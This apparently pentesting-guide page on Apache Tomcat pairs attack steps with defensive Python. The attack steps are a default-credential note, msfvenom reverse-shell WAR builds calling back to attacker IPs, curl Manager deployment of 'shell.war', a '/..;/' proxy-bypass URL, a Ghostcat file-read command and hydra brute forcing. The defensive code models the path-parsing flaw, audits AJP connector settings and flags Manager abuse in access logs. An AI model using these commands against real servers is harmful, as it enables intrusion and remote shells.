# Apache Tomcat

## Introduction

Apache Tomcat is a Java-based HTTP server and servlet container. Its Manager Application deploys Web Application Archive (WAR) files, which package Java Servlets and JavaServer Pages (JSP) that add functionality to the application.

If an attacker gains access to the Tomcat Manager Application through [default credentials](https://github.com/netbiosX/Default-Credentials/blob/master/Apache-Tomcat-Default-Passwords.mdown) such as `tomcat:s3cret` or weak credentials, they can obtain RCE by uploading a malicious WAR file.

## Reverse shell

You can use msfvenom to create a `.war` file that contains a reverse shell.

```bash
# Linux
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.119.122 LPORT=443 -f war -o revshell.war
# Windows
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.15.83 LPORT=9002 -f war > revshell.war
```

Then deploy the WAR file from `/manager/html`; browsing to the deployed application triggers the reverse shell.

![Tomcat Manager App](https://3683125600-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FAiuSjJMFQ72nHxKtvtIh%2Fuploads%2Fgit-blob-333dbf5ac22f54a889d975b0bd266eb342bae064%2Fimage-20220403141155224.png?alt=media)

### Upload via curl

If the Tomcat server is **misconfigured** or you can reach the Tomcat service from **localhost**, you can deploy/undeploy a reverse shell without going through the web interface.

```bash
# Deploy through the text interface (Tomcat 7+; the account needs the manager-script role).
# Use localhost instead of <TARGET_IP> when running on the host itself.
curl --user '<USER>:<PASSWORD>' --upload-file shell.war "http://<TARGET_IP>:8080/manager/text/deploy?path=/shell"
curl http://<TARGET_IP>:8080/shell/ # Requesting the deployed app triggers the reverse shell

# Undeploy (the path must match the one used at deploy time)
curl --user '<USER>:<PASSWORD>' "http://<TARGET_IP>:8080/manager/text/undeploy?path=/shell"
```

## Tomcat path traversal

When Apache Tomcat sits behind a reverse proxy, Tomcat strips path parameters (the `;...` suffix of a path segment) before normalising the URL, so it treats the sequence `/..;/` as `/../`. The reverse proxy does not, so an attacker can reach Tomcat resources that the reverse proxy mapping is not supposed to expose.

```
https://<TARGET_IP>/manager/status/..;/html/
```
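To see the parser differential the bypass relies on, here is an added Python example (not from the original page or from Tomcat) that models how a reverse proxy and Tomcat each normalise the same request path, and shows why an allow/deny rule evaluated on the proxy's view lets `/manager/status/..;/html/` through while the same rule evaluated on the backend's view does not. The denied prefixes and the simplified normalisation are assumptions made for the illustration; real proxies and Tomcat releases differ in detail.

```python
from posixpath import normpath

# Constructed policy for the example: the proxy publishes /manager/status/* (say, for a
# monitoring tool) and is supposed to block every other Manager endpoint.
DENIED_PREFIXES = ("/manager/html", "/manager/text", "/manager/jmxproxy")


def proxy_view(path):
    """Path as a typical reverse proxy normalises it: '.' and '..' segments are
    resolved, but '..;' stays an opaque segment because the proxy knows nothing
    about servlet path parameters."""
    return normpath(path)


def tomcat_view(path):
    """Path as Tomcat resolves it (simplified): the ';param' suffix is stripped from
    every segment first, so '/..;/' becomes '/../' and is then collapsed."""
    without_params = "/".join(segment.split(";", 1)[0] for segment in path.split("/"))
    return normpath(without_params)


def proxy_allows(path):
    """Vulnerable ACL: the decision is made on the proxy's own view of the path."""
    return not proxy_view(path).startswith(DENIED_PREFIXES)


def proxy_allows_fixed(path):
    """Hardened ACL: decide on the path as the backend will actually resolve it."""
    return not tomcat_view(path).startswith(DENIED_PREFIXES)


def trace(path):
    """Summarise how one request fares under both ACLs."""
    return {
        "request": path,
        "proxy_sees": proxy_view(path),
        "tomcat_serves": tomcat_view(path),
        "passes_vulnerable_acl": proxy_allows(path),
        "passes_fixed_acl": proxy_allows_fixed(path),
    }


if __name__ == "__main__":
    for p in ("/manager/status/", "/manager/status/../html/", "/manager/status/..;/html/"):
        print(trace(p))
```

Note that `;jsessionid=...` is a legitimate use of path parameters in Tomcat, so simply rejecting every `;` at the proxy can break URL-rewritten sessions; the robust fix is to evaluate access rules on the backend's view of the path, and better still not to publish the Manager context through the proxy at all.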

## Ghostcat (CVE-2020-1938)

[CVE-2020-1938](https://github.com/00theway/Ghostcat-CNVD-2020-10487) allows an unauthenticated attacker to read web application files (such as `WEB-INF/web.xml`) from a vulnerable server through the AJP connector on port 8009.

```bash
python3 ajpShooter.py http://<TARGET_IP>:8080 8009 /WEB-INF/web.xml read
```
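From the defending side, exposure to this issue comes down to how the AJP connector is configured in `server.xml`. The following audit script is an added Python example, not part of the original page or of Tomcat: it parses a constructed `server.xml` that contains both a pre-fix-style connector and a hardened one, and reports which protective attributes are missing. The version numbers in the comments are the releases that changed the AJP defaults (9.0.31, 8.5.51, 7.0.100); the attribute checks themselves are the example's own assumptions about what a reviewer wants flagged.

```python
import xml.etree.ElementTree as ET

# Constructed sample server.xml (not from any real deployment): one AJP connector in the
# pre-fix style and one hardened connector, side by side.
SAMPLE_SERVER_XML = """<Server port="8005" shutdown="SHUTDOWN">
  <Service name="Catalina">
    <Connector port="8080" protocol="HTTP/1.1" connectionTimeout="20000" redirectPort="8443"/>
    <!-- weak: reachable on every interface, no shared secret with the front-end proxy -->
    <Connector port="8009" protocol="AJP/1.3" redirectPort="8443"/>
    <!-- hardened: loopback only, secret required and set -->
    <Connector port="8010" protocol="AJP/1.3" address="127.0.0.1"
               secretRequired="true" secret="REPLACE_WITH_RANDOM_SECRET" redirectPort="8443"/>
    <Engine name="Catalina" defaultHost="localhost"/>
  </Service>
</Server>
"""

LOOPBACK_ADDRESSES = {"127.0.0.1", "::1", "0:0:0:0:0:0:0:1", "localhost"}


def audit_ajp_connectors(server_xml):
    """Return one finding per AJP connector: its port, address and a list of issues.
    Connectors that are commented out (the default since the fix) are not parsed
    and therefore produce no finding."""
    findings = []
    for conn in ET.fromstring(server_xml).iter("Connector"):
        protocol = conn.get("protocol", "HTTP/1.1")
        if not protocol.upper().startswith("AJP"):
            continue
        issues = []
        address = conn.get("address")
        if address is None:
            # Before 9.0.31 / 8.5.51 / 7.0.100 the connector bound to all interfaces by
            # default; later releases default to loopback, but an explicit address is
            # easy to verify and does not depend on the installed version.
            issues.append("no address attribute (all interfaces on pre-fix versions)")
        elif address not in LOOPBACK_ADDRESSES:
            issues.append(f"bound to non-loopback address {address}")
        if conn.get("secretRequired", "true").lower() == "false":
            issues.append("secretRequired=false: the proxy need not authenticate to AJP")
        # 'secret' is the current attribute name; 'requiredSecret' was the older one.
        if not (conn.get("secret") or conn.get("requiredSecret")):
            issues.append("no AJP shared secret configured")
        findings.append({"port": conn.get("port"), "address": address, "issues": issues})
    return findings


if __name__ == "__main__":
    for finding in audit_ajp_connectors(SAMPLE_SERVER_XML):
        status = "OK" if not finding["issues"] else "; ".join(finding["issues"])
        print(f"AJP connector on port {finding['port']}: {status}")
```

If the AJP connector is not needed at all (no front-end proxy speaks AJP), leaving it commented out in `server.xml`, as recent Tomcat releases do by default, removes the attack surface entirely.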

## Brute forcing

Use it as your last resort, because you might lock the account.

```bash
hydra -L <USERS.txt> -P <PASSWORDS.txt> http-get://<TARGET_IP>:8080/manager/html
```
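For the detection side of both the Manager deployment sections above and this brute-forcing section, here is an added Python example (not from the page, from Tomcat or from any of the tools it references) that reads Tomcat access-log lines in the default `%h %l %u %t "%r" %s %b` pattern and flags two traces these techniques leave behind: a burst of `401` responses on `/manager/*` from one source, and deployments through the Manager's text or HTML interface. The log lines are constructed for the example; the thresholds and the endpoint list are assumptions to tune for a real deployment.

```python
import re
from collections import defaultdict
from datetime import datetime

# Tomcat's default AccessLogValve pattern: %h %l %u %t "%r" %s %b
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) \S+$'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

# Requests that deploy an application through the Manager (text and HTML interfaces).
# Assumed endpoint list for the example; extend it for other deployment routes you use.
DEPLOY_ENDPOINTS = (("PUT", "/manager/text/deploy"), ("POST", "/manager/html/upload"))

# Constructed sample log (not from a real server): a password-guessing burst against
# /manager/html, a successful login, a WAR deployment, and unrelated traffic.
SAMPLE_LOG = [
    f'10.0.0.5 - - [03/Apr/2022:14:11:{s:02d} +0000] "GET /manager/html HTTP/1.1" 401 2536'
    for s in range(0, 36, 3)  # 12 failed attempts in 33 seconds
] + [
    '10.0.0.5 - tomcat [03/Apr/2022:14:12:01 +0000] "GET /manager/html HTTP/1.1" 200 19873',
    '10.0.0.5 - tomcat [03/Apr/2022:14:12:20 +0000] "PUT /manager/text/deploy?path=/shell HTTP/1.1" 200 54',
    '10.0.0.9 - - [03/Apr/2022:14:12:25 +0000] "GET /app/index.jsp HTTP/1.1" 200 1024',
    '10.0.0.9 - - [03/Apr/2022:14:12:30 +0000] "GET /manager/html HTTP/1.1" 401 2536',
]


def parse_line(line):
    """Parse one access-log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
    rec["status"] = int(rec["status"])
    return rec


def detect_manager_bruteforce(lines, threshold=10, window_seconds=60):
    """Return {ip: count} for sources with at least `threshold` 401 responses on
    /manager/* inside any sliding window of `window_seconds`."""
    failures = defaultdict(list)
    for rec in map(parse_line, lines):
        if rec and rec["status"] == 401 and rec["path"].startswith("/manager/"):
            failures[rec["ip"]].append(rec["ts"])
    flagged = {}
    for ip, times in failures.items():
        times.sort()
        best = start = 0
        for end, t in enumerate(times):
            while (t - times[start]).total_seconds() > window_seconds:
                start += 1
            best = max(best, end - start + 1)
        if best >= threshold:
            flagged[ip] = best
    return flagged


def detect_manager_deployments(lines):
    """Return (ip, user, path, status) for every deployment request made through the Manager."""
    hits = []
    for rec in map(parse_line, lines):
        if rec is None:
            continue
        for method, prefix in DEPLOY_ENDPOINTS:
            if rec["method"] == method and rec["path"].startswith(prefix):
                hits.append((rec["ip"], rec["user"], rec["path"], rec["status"]))
    return hits


if __name__ == "__main__":
    print("brute force:", detect_manager_bruteforce(SAMPLE_LOG))
    print("deployments:", detect_manager_deployments(SAMPLE_LOG))
```

Correlating the two results (a deployment from an address that was flagged for failed logins minutes earlier) is the strongest signal; on its own, a deployment by a known automation account is normal operations.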

## References

* [Tomcat](https://book.hacktricks.xyz/pentesting/pentesting-web/tomcat)
* [Multiple Ways to Exploit Tomcat Manager](https://www.hackingarticles.in/multiple-ways-to-exploit-tomcat-manager/)
* [Tomcat path traversal via reverse proxy mapping](https://www.acunetix.com/vulnerabilities/web/tomcat-path-traversal-via-reverse-proxy-mapping/)
* [Breaking Parser Logic!](https://i.blackhat.com/us-18/Wed-August-8/us-18-Orange-Tsai-Breaking-Parser-Logic-Take-Your-Path-Normalization-Off-And-Pop-0days-Out-2.pdf)
